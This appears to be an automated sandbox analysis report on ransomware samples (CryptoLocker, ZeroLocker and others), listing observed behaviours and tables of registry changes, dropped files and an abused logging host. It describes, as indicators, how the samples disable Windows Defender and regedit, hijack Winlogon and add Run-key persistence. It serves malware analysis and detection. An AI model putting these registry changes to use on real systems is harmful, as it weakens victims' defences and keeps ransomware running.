Analysis Overview
Threat Level: Known bad
The file https://bazaar.abuse.ch/browse.php?search=tag%3Alocker was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
CryptoLocker
Modifies WinLogon for persistence
Cryptolocker family
Deletes shadow copies
Disables RegEdit via registry modification
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Credentials from Password Stores: Windows Credential Manager
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Drops startup file
Drops desktop.ini file(s)
Adds Run key to start application
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Drops autorun.inf file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates system info in registry
Uses Volume Shadow Copy service COM API
Runs net.exe
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
System policy modification
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Opens file in notepad (likely ransom note)
Kills process with taskkill
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Uses Volume Shadow Copy WMI provider
Modifies Internet Explorer settings
Gathers network information
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-04-19 21:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-19 21:02
Reported
2025-04-19 21:18
Platform
win10ltsc2021-20250314-en
Max time kernel
934s
Max time network
936s
Command Line
Signatures
CryptoLocker
Cryptolocker family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" | C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe | N/A |
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
Modifies Windows Defender Real-time Protection settings
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Deletes shadow copies
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmp2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
Credentials from Password Stores: Windows Credential Manager
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\winlogon.exe | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\tmp2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileRescue = "C:\\ZeroLocker\\ZeroRescue.exe" | C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" | C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe | N/A |
Drops desktop.ini file(s)
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\Tsuchigumo.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\Tsuchigumo.bat | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\autofill_bypass_cache_forms.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
